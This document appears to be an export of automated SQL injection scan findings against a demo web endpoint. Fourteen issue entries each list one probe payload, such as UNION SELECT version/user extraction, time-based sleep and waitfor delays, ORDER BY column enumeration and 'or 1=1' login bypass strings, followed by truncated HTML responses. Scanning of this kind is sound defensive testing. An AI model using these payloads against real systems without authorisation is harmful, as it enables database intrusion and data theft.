<title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1397\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1398\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# ')) or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1399\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1400\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or sleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1401\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1402\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ;waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1403\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ;%00\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1404\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1405\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1406\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or \"1\"=\"1\"/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1407\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1408Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1409\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1410\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\" or \"1\"=\"1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 